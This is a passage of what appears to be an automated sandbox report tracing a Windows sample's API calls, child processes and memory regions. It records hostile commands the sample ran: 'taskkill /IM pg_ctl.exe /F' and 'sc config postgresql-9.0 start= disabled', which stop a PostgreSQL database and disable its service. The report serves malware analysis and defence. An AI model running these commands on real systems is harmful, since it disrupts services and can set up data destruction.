_String2="CHDIR") returned 17 [0128.479] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0128.479] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0128.480] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0128.480] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0128.480] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0128.480] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0128.480] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0128.480] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0128.480] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0128.480] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0128.480] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0128.480] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0128.480] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0128.480] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0128.480] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0128.480] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0128.480] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0128.480] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0128.480] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0128.480] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0128.480] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0128.480] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0128.480] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0128.480] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0128.480] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0128.480] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0128.480] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0128.480] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0128.480] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0128.480] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0128.480] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0128.480] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0128.480] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0128.480] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0128.480] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0128.480] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0128.480] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0128.480] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0128.480] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0128.481] SetErrorMode (uMode=0x0) returned 0x0 [0128.481] SetErrorMode (uMode=0x1) returned 0x0 [0128.481] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x526af40, lpFilePart=0x4f6f1e4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f6f1e4*="Desktop") returned 0x1d [0128.481] SetErrorMode (uMode=0x0) returned 0x1 [0128.481] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0128.481] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.488] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.488] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.488] GetConsoleTitleW (in: lpConsoleTitle=0x4f6f464, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.488] InitializeProcThreadAttributeList (in: lpAttributeList=0x4f6f390, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4f6f374 | out: lpAttributeList=0x4f6f390, lpSize=0x4f6f374) returned 1 [0128.488] UpdateProcThreadAttribute (in: lpAttributeList=0x4f6f390, dwFlags=0x0, Attribute=0x60001, lpValue=0x4f6f37c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4f6f390, lpPreviousValue=0x0) returned 1 [0128.489] GetStartupInfoW (in: lpStartupInfo=0x4f6f3c8 | out: lpStartupInfo=0x4f6f3c8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0128.489] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0128.489] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.490] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill \\/IM pg_ctl.exe \\/F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4f6f318*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill \\/IM pg_ctl.exe \\/F", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4f6f364 | out: lpCommandLine="taskkill \\/IM pg_ctl.exe \\/F", lpProcessInformation=0x4f6f364*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x310, dwThreadId=0x544)) returned 1 [0128.496] CloseHandle (hObject=0xa4) returned 1 [0128.496] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.496] GetEnvironmentStringsW () returned 0x5269ed8* [0128.496] FreeEnvironmentStringsA (penv="=") returned 1 [0128.496] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0128.586] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4f6f2fc | out: lpExitCode=0x4f6f2fc*=0x1) returned 1 [0128.586] CloseHandle (hObject=0xa8) returned 1 [0128.586] _vsnwprintf (in: _Buffer=0x4f6f3e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x4f6f304 | out: _Buffer="00000001") returned 8 [0128.586] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0128.586] GetEnvironmentStringsW () returned 0x526b3c8* [0128.586] FreeEnvironmentStringsA (penv="=") returned 1 [0128.586] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0128.586] GetEnvironmentStringsW () returned 0x526b3c8* [0128.587] FreeEnvironmentStringsA (penv="=") returned 1 [0128.587] DeleteProcThreadAttributeList (in: lpAttributeList=0x4f6f390 | out: lpAttributeList=0x4f6f390) [0128.587] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.587] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0128.587] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.587] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0128.587] _get_osfhandle (_FileHandle=0) returned 0x38 [0128.587] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0128.587] SetConsoleInputExeNameW () returned 0x1 [0128.587] GetConsoleOutputCP () returned 0x1b5 [0128.588] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0128.588] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.588] exit (_Code=1) Thread: id = 406 os_tid = 0x74c Process: id = "107" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x263f9000" os_pid = "0xe30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "106" os_parent_pid = "0xe2c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6343 start_va = 0x7fcfb000 end_va = 0x7fcfbfff entry_point = 0x0 region_type = private name = "private_0x000000007fcfb000" filename = "" Region: id = 6344 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6345 start_va = 0xcb953e0000 end_va = 0xcb953fffff entry_point = 0x0 region_type = private name = "private_0x000000cb953e0000" filename = "" Region: id = 6346 start_va = 0xcb95400000 end_va = 0xcb95413fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb95400000" filename = "" Region: id = 6347 start_va = 0xcb95420000 end_va = 0xcb9545ffff entry_point = 0x0 region_type = private name = "private_0x000000cb95420000" filename = "" Region: id = 6348 start_va = 0x7df5ff780000 end_va = 0x7ff5ff77ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff780000" filename = "" Region: id = 6349 start_va = 0x7ff6c4190000 end_va = 0x7ff6c41b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4190000" filename = "" Region: id = 6350 start_va = 0x7ff6c41b5000 end_va = 0x7ff6c41b5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41b5000" filename = "" Region: id = 6351 start_va = 0x7ff6c41be000 end_va = 0x7ff6c41bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41be000" filename = "" Region: id = 6352 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6353 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6354 start_va = 0xcb953e0000 end_va = 0xcb953effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb953e0000" filename = "" Region: id = 6355 start_va = 0xcb953f0000 end_va = 0xcb953f6fff entry_point = 0x0 region_type = private name = "private_0x000000cb953f0000" filename = "" Region: id = 6356 start_va = 0xcb95460000 end_va = 0xcb9551dfff entry_point = 0xcb95460000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6357 start_va = 0xcb95520000 end_va = 0xcb9555ffff entry_point = 0x0 region_type = private name = "private_0x000000cb95520000" filename = "" Region: id = 6358 start_va = 0xcb95560000 end_va = 0xcb95560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb95560000" filename = "" Region: id = 6359 start_va = 0xcb95570000 end_va = 0xcb95576fff entry_point = 0x0 region_type = private name = "private_0x000000cb95570000" filename = "" Region: id = 6360 start_va = 0xcb95580000 end_va = 0xcb95580fff entry_point = 0x0 region_type = private name = "private_0x000000cb95580000" filename = "" Region: id = 6361 start_va = 0xcb95590000 end_va = 0xcb95590fff entry_point = 0x0 region_type = private name = "private_0x000000cb95590000" filename = "" Region: id = 6362 start_va = 0xcb955b0000 end_va = 0xcb956affff entry_point = 0x0 region_type = private name = "private_0x000000cb955b0000" filename = "" Region: id = 6363 start_va = 0xcb95820000 end_va = 0xcb9582ffff entry_point = 0x0 region_type = private name = "private_0x000000cb95820000" filename = "" Region: id = 6364 start_va = 0xcb95830000 end_va = 0xcb959b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb95830000" filename = "" Region: id = 6365 start_va = 0xcb959c0000 end_va = 0xcb95b40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb959c0000" filename = "" Region: id = 6366 start_va = 0xcb95b50000 end_va = 0xcb96f4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb95b50000" filename = "" Region: id = 6367 start_va = 0x7ff6c4090000 end_va = 0x7ff6c418ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4090000" filename = "" Region: id = 6368 start_va = 0x7ff6c41bc000 end_va = 0x7ff6c41bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41bc000" filename = "" Region: id = 6369 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6370 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6371 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6372 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6373 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6374 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6375 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6376 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6377 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6378 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6379 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6380 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6381 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6382 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 403 os_tid = 0x420 Thread: id = 404 os_tid = 0xe28 Thread: id = 405 os_tid = 0xe78 Process: id = "108" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x25af7000" os_pid = "0x310" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "106" os_parent_pid = "0xe2c" cmd_line = "taskkill \\/IM pg_ctl.exe \\/F" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6396 start_va = 0x130000 end_va = 0x145fff entry_point = 0x130000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 6397 start_va = 0xac0000 end_va = 0x4abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 6398 start_va = 0x4ac0000 end_va = 0x4adffff entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 6399 start_va = 0x4ae0000 end_va = 0x4ae1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ae0000" filename = "" Region: id = 6400 start_va = 0x4af0000 end_va = 0x4b03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004af0000" filename = "" Region: id = 6401 start_va = 0x4b10000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 6402 start_va = 0x4b50000 end_va = 0x4b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 6403 start_va = 0x4b90000 end_va = 0x4b93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b90000" filename = "" Region: id = 6404 start_va = 0x4ba0000 end_va = 0x4ba0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ba0000" filename = "" Region: id = 6405 start_va = 0x4bb0000 end_va = 0x4bb1fff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 6406 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6407 start_va = 0x7e880000 end_va = 0x7e8a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e880000" filename = "" Region: id = 6408 start_va = 0x7e8ab000 end_va = 0x7e8abfff entry_point = 0x0 region_type = private name = "private_0x000000007e8ab000" filename = "" Region: id = 6409 start_va = 0x7e8ac000 end_va = 0x7e8aefff entry_point = 0x0 region_type = private name = "private_0x000000007e8ac000" filename = "" Region: id = 6410 start_va = 0x7e8af000 end_va = 0x7e8affff entry_point = 0x0 region_type = private name = "private_0x000000007e8af000" filename = "" Region: id = 6411 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6412 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6413 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6414 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6415 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6416 start_va = 0x4cf0000 end_va = 0x4cfffff entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 6417 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6418 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6419 start_va = 0x4e30000 end_va = 0x4f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 6420 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 407 os_tid = 0x544 Thread: id = 408 os_tid = 0xe9c Process: id = "109" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x255a9000" os_pid = "0xe98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config postgresql-9.0 start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6421 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6422 start_va = 0x4a0000 end_va = 0x449ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 6423 start_va = 0x44a0000 end_va = 0x44bffff entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 6424 start_va = 0x44c0000 end_va = 0x44c0fff entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 6425 start_va = 0x44d0000 end_va = 0x44e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 6426 start_va = 0x44f0000 end_va = 0x452ffff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 6427 start_va = 0x4530000 end_va = 0x462ffff entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 6428 start_va = 0x4630000 end_va = 0x4633fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004630000" filename = "" Region: id = 6429 start_va = 0x4640000 end_va = 0x4640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004640000" filename = "" Region: id = 6430 start_va = 0x4650000 end_va = 0x4651fff entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 6431 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6432 start_va = 0x7ed80000 end_va = 0x7eda2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed80000" filename = "" Region: id = 6433 start_va = 0x7eda7000 end_va = 0x7eda7fff entry_point = 0x0 region_type = private name = "private_0x000000007eda7000" filename = "" Region: id = 6434 start_va = 0x7edac000 end_va = 0x7edaefff entry_point = 0x0 region_type = private name = "private_0x000000007edac000" filename = "" Region: id = 6435 start_va = 0x7edaf000 end_va = 0x7edaffff entry_point = 0x0 region_type = private name = "private_0x000000007edaf000" filename = "" Region: id = 6436 start_va = 